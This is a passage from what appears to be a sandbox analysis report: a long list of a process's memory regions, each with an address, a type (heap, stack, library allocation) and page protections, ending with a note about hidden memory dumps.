page write copy
5A10000
trusted library allocation
page execute and read and write
93E000
stack
page read and write
2EC0000
trusted library allocation
page read and write
12C0000
trusted library allocation
page read and write
53E0000
trusted library allocation
page read and write
1310000
heap
page read and write
2D5F000
stack
page read and write
9B0000
heap
page read and write
2654000
trusted library allocation
page read and write
141B000
trusted library allocation
page execute and read and write
3018000
trusted library allocation
page read and write
2F0F000
stack
page read and write
38A0000
heap
page read and write
33F5000
trusted library allocation
page read and write
2ED0000
heap
page read and write
2460000
heap
page read and write
75A000
heap
page read and write
304C000
stack
page read and write
3248000
trusted library allocation
page read and write
30B4000
trusted library allocation
page read and write
3432000
trusted library allocation
page read and write
900000
heap
page read and write
11D0000
trusted library allocation
page read and write
8150000
trusted library allocation
page execute and read and write
FC0000
heap
page read and write
3010000
trusted library allocation
page read and write
12FF000
stack
page read and write
682E000
stack
page read and write
752000
heap
page read and write
2D90000
trusted library allocation
page read and write
59EC000
trusted library allocation
page read and write
42D0000
trusted library allocation
page read and write
20BF000
stack
page read and write
5B2B000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
1250000
trusted library allocation
page read and write
59A3000
trusted library allocation
page read and write
5730000
trusted library allocation
page read and write
2C8F000
stack
page read and write
B39000
stack
page read and write
3226000
trusted library allocation
page read and write
5B5000
heap
page read and write
57A0000
trusted library allocation
page read and write
7E3D000
stack
page read and write
7FF3000
heap
page read and write
6FD0000
heap
page read and write
15AE000
heap
page read and write
3631000
trusted library allocation
page read and write
42C0000
trusted library allocation
page read and write
541C000
trusted library allocation
page read and write
540000
heap
page read and write
56FB000
trusted library allocation
page read and write
B3C000
heap
page read and write
327A000
trusted library allocation
page read and write
4C60000
heap
page execute and read and write
323B000
trusted library allocation
page read and write
6300000
heap
page read and write
E83000
trusted library allocation
page execute and read and write
4970000
heap
page execute and read and write
F5E000
stack
page read and write
7F710000
trusted library allocation
page execute and read and write
580000
heap
page read and write
3237000
trusted library allocation
page read and write
5F0F000
stack
page read and write
6840000
heap
page read and write
2A0E000
stack
page read and write
50A3000
trusted library allocation
page read and write
83DD000
stack
page read and write
1502000
trusted library allocation
page read and write
5C7C000
stack
page read and write
E40000
heap
page read and write
7EC0000
trusted library allocation
page read and write
341B000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
5A4E000
stack
page read and write
59C0000
trusted library allocation
page read and write
735000
heap
page read and write
7DD0000
heap
page read and write
2652000
trusted library allocation
page read and write
AEB000
heap
page read and write
73F000
heap
page read and write
BE0000
trusted library allocation
page read and write
3F8A000
trusted library allocation
page read and write
1070000
heap
page read and write
325F000
trusted library allocation
page read and write
ED7000
trusted library allocation
page execute and read and write
BFA000
trusted library allocation
page execute and read and write
858E000
stack
page read and write
ADF000
heap
page read and write
52EE000
trusted library allocation
page read and write
7FA70000
trusted library allocation
page execute and read and write
56D9000
trusted library allocation
page read and write
4CAE000
stack
page read and write
F52000
trusted library allocation
page read and write
33F9000
trusted library allocation
page read and write
7360000
trusted library allocation
page read and write
57BB000
trusted library allocation
page read and write
5F9E000
stack
page read and write
3222000
trusted library allocation
page read and write
43B5000
trusted library allocation
page read and write
1260000
heap
page read and write
13D0000
trusted library allocation
page read and write
1406000
trusted library allocation
page execute and read and write
11E3000
trusted library allocation
page read and write
15C7000
heap
page read and write
3DC1000
trusted library allocation
page read and write
19A000
stack
page read and write
3412000
trusted library allocation
page read and write
52E4000
trusted library allocation
page read and write
12AE000
stack
page read and write
2C93000
trusted library allocation
page read and write
63EE000
stack
page read and write
3057000
trusted library allocation
page read and write
2F77000
trusted library allocation
page read and write
290E000
stack
page read and write
9FE000
stack
page read and write
150A000
trusted library allocation
page execute and read and write
3652000
trusted library allocation
page read and write
2B94000
trusted library allocation
page read and write
3031000
trusted library allocation
page read and write
43F0000
trusted library allocation
page execute and read and write
3297000
trusted library allocation
page read and write
744000
heap
page read and write
7330000
trusted library allocation
page read and write
420000
heap
page read and write
AC0000
heap
page read and write
13E9000
trusted library allocation
page read and write
BEE000
stack
page read and write
5340000
trusted library allocation
page read and write
2A60000
heap
page execute and read and write
5C80000
trusted library allocation
page read and write
1018000
heap
page read and write
324E000
trusted library allocation
page read and write
5E00000
trusted library allocation
page execute and read and write
2920000
heap
page read and write
3239000
trusted library allocation
page read and write
2621000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page read and write
4D84000
trusted library allocation
page read and write
A3C000
stack
page read and write
57CF000
stack
page read and write
33FB000
trusted library allocation
page read and write
13ED000
trusted library allocation
page execute and read and write
AFE000
stack
page read and write
3F85000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
6FC9000
heap
page read and write
5669000
trusted library allocation
page read and write
C07000
trusted library allocation
page execute and read and write
640000
unkown
page readonly
5710000
trusted library allocation
page read and write
F8E000
heap
page read and write
44B0000
heap
page read and write
3E3D000
trusted library allocation
page read and write
2B9D000
trusted library allocation
page execute and read and write
537E000
stack
page read and write
52F1000
trusted library allocation
page read and write
30A8000
trusted library allocation
page read and write
1350000
heap
page execute and read and write
327E000
trusted library allocation
page read and write
1320000
heap
page read and write
3063000
trusted library allocation
page read and write
50B0000
heap
page read and write
261F000
trusted library allocation
page read and write
D10000
trusted library allocation
page execute and read and write
2615000
trusted library allocation
page read and write
5BBC000
stack
page read and write
5CC0000
trusted library section
page read and write
2B0F000
stack
page read and write
13F0000
heap
page read and write
5790000
trusted library allocation
page read and write
5346000
heap
page read and write
5AFD000
stack
page read and write
364C000
trusted library allocation
page read and write
3EFB000
trusted library allocation
page read and write
5696000
trusted library allocation
page read and write
13F5000
heap
page read and write
40E000
unkown
page readonly
E84000
trusted library allocation
page read and write
1510000
trusted library allocation
page read and write
F6B000
trusted library allocation
page execute and read and write
2DB0000
heap
page read and write
72BD000
stack
page read and write
3072000
trusted library allocation
page read and write
52BF000
trusted library allocation
page read and write
2626000
trusted library allocation
page read and write
302F000
trusted library allocation
page read and write
8390000
trusted library allocation
page execute and read and write
5A00000
trusted library allocation
page execute and read and write
675E000
stack
page read and write
66FF000
stack
page read and write
642E000
stack
page read and write
437F000
stack
page read and write
2BB0000
heap
page read and write
445C000
stack
page read and write
25EB000
trusted library allocation
page read and write
308E000
stack
page read and write
6350000
heap
page read and write
11E9000
trusted library allocation
page read and write
56E0000
trusted library allocation
page read and write
52D6000
trusted library allocation
page read and write
CC0000
heap
page read and write
5DF3000
trusted library allocation
page read and write
632D000
stack
page read and write
7F080000
trusted library allocation
page execute and read and write
F30000
trusted library allocation
page read and write
2AA0000
heap
page read and write
862000
unkown
page readonly
5FE0000
trusted library allocation
page execute and read and write
401000
unkown
page execute read
309C000
trusted library allocation
page read and write
2BDE000
heap
page read and write
5320000
heap
page execute and read and write
64FE000
stack
page read and write
F40000
heap
page read and write
59E000
stack
page read and write
10F2000
heap
page read and write
11DD000
trusted library allocation
page execute and read and write
64EE000
stack
page read and write
103E000
stack
page read and write
2D7C000
stack
page read and write
3614000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
3427000
trusted library allocation
page read and write
2BAE000
stack
page read and write
AAE000
stack
page read and write
728000
heap
page read and write
52D0000
heap
page read and write
1417000
trusted library allocation
page execute and read and write
C3E000
stack
page read and write
7D9B000
trusted library allocation
page read and write
401000
unkown
page execute read
D28000
heap
page read and write
59A0000
trusted library allocation
page read and write
487D000
stack
page read and write
401000
unkown
page execute read
30B2000
trusted library allocation
page read and write
5C62000
heap
page read and write
3097000
trusted library allocation
page read and write
5864000
trusted library allocation
page read and write
6B4A000
stack
page read and write
33E1000
trusted library allocation
page read and write
5C6E000
stack
page read and write
1500000
trusted library allocation
page read and write
2C22000
heap
page read and write
7DF0000
heap
page read and write
1412000
trusted library allocation
page read and write
3506000
trusted library allocation
page read and write
5360000
trusted library allocation
page read and write
2C5E000
stack
page read and write
25FE000
trusted library allocation
page read and write
2BB1000
trusted library allocation
page read and write
864E000
stack
page read and write
4EFE000
stack
page read and write
F4D000
trusted library allocation
page execute and read and write
131E000
stack
page read and write
5C70000
trusted library allocation
page execute and read and write
7F38000
heap
page read and write
67B0000
heap
page read and write
6EE000
stack
page read and write
7370000
trusted library allocation
page read and write
5DC0000
trusted library allocation
page execute and read and write
5DB0000
trusted library allocation
page read and write
6F20000
heap
page execute and read and write
CB4000
trusted library allocation
page read and write
53E000
stack
page read and write
422B000
trusted library allocation
page read and write
5A50000
trusted library allocation
page execute and read and write
56A0000
trusted library allocation
page read and write
763000
heap
page read and write
2CA9000
heap
page read and write
535A000
trusted library allocation
page read and write
4380000
heap
page readonly
3280000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
320B000
trusted library allocation
page read and write
727E000
stack
page read and write
493E000
stack
page read and write
11AE000
stack
page read and write
53D0000
trusted library allocation
page read and write
672E000
stack
page read and write
F85000
heap
page read and write
3635000
trusted library allocation
page read and write
55C5000
trusted library allocation
page read and write
8FE000
stack
page read and write
3061000
trusted library allocation
page read and write
There are 1033 hidden memdumps, click here to show them.